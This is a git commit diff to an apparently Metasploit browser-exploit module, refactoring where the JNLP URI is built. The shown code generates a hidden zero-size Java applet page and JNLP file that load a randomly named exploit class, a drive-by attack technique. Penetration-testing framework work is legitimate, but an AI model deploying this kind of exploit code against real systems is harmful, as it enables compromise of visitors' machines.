Build the jnlp uri when resource is available
parent
cc961977a2
commit
8eea476cb8
|
@ -93,17 +93,19 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
@exploit_class_name = rand_text_alpha("Exploit".length)
|
@exploit_class_name = rand_text_alpha("Exploit".length)
|
||||||
@exploit_class.gsub!("Exploit", @exploit_class_name)
|
@exploit_class.gsub!("Exploit", @exploit_class_name)
|
||||||
|
|
||||||
@jnlp_uri = ((datastore['SSL']) ? "https://" : "http://")
|
@jnlp_name = rand_text_alpha(8)
|
||||||
@jnlp_uri << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST'])
|
|
||||||
@jnlp_uri << ":#{datastore['SRVPORT']}#{get_resource()}/#{rand_text_alpha(8)}.jnlp"
|
|
||||||
|
|
||||||
super
|
super
|
||||||
end
|
end
|
||||||
|
|
||||||
def jnlp_file
|
def jnlp_file
|
||||||
%Q|
|
jnlp_uri = ((datastore['SSL']) ? "https://" : "http://")
|
||||||
|
jnlp_uri << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST'])
|
||||||
|
jnlp_uri << ":#{datastore['SRVPORT']}#{get_resource()}/#{@jnlp_name}.jnlp"
|
||||||
|
|
||||||
|
jnlp = %Q|
|
||||||
<?xml version="1.0" encoding="utf-8"?>
|
<?xml version="1.0" encoding="utf-8"?>
|
||||||
<jnlp spec="1.0" xmlns:jfx="http://javafx.com" href="#{@jnlp_uri}">
|
<jnlp spec="1.0" xmlns:jfx="http://javafx.com" href="#{jnlp_uri}">
|
||||||
<information>
|
<information>
|
||||||
<title>Applet Test JNLP</title>
|
<title>Applet Test JNLP</title>
|
||||||
<vendor>#{rand_text_alpha(8)}</vendor>
|
<vendor>#{rand_text_alpha(8)}</vendor>
|
||||||
|
@ -121,6 +123,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
<update check="background"/>
|
<update check="background"/>
|
||||||
</jnlp>
|
</jnlp>
|
||||||
|
|
|
|
||||||
|
return jnlp
|
||||||
end
|
end
|
||||||
|
|
||||||
def on_request_uri(cli, request)
|
def on_request_uri(cli, request)
|
||||||
|
@ -161,11 +164,15 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
|
|
||||||
def generate_html
|
def generate_html
|
||||||
|
jnlp_uri = ((datastore['SSL']) ? "https://" : "http://")
|
||||||
|
jnlp_uri << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST'])
|
||||||
|
jnlp_uri << ":#{datastore['SRVPORT']}#{get_resource()}/#{@jnlp_name}.jnlp"
|
||||||
|
|
||||||
html = %Q|
|
html = %Q|
|
||||||
<html>
|
<html>
|
||||||
<body>
|
<body>
|
||||||
<object codebase="http://java.sun.com/update/1.6.0/jinstall-6-windows-i586.cab#Version=6,0,0,0" classid="clsid:5852F5ED-8BF4-11D4-A245-0080C6F74284" height=0 width=0>
|
<object codebase="http://java.sun.com/update/1.6.0/jinstall-6-windows-i586.cab#Version=6,0,0,0" classid="clsid:5852F5ED-8BF4-11D4-A245-0080C6F74284" height=0 width=0>
|
||||||
<param name="app" value="#{@jnlp_uri}">
|
<param name="app" value="#{jnlp_uri}">
|
||||||
<param name="back" value="true">
|
<param name="back" value="true">
|
||||||
<applet archive="#{rand_text_alpha(8)}.jar" code="#{@exploit_class_name}.class" width="1" height="1"></applet>
|
<applet archive="#{rand_text_alpha(8)}.jar" code="#{@exploit_class_name}.class" width="1" height="1"></applet>
|
||||||
</object>
|
</object>
|
||||||
|
|
Loading…
Reference in New Issue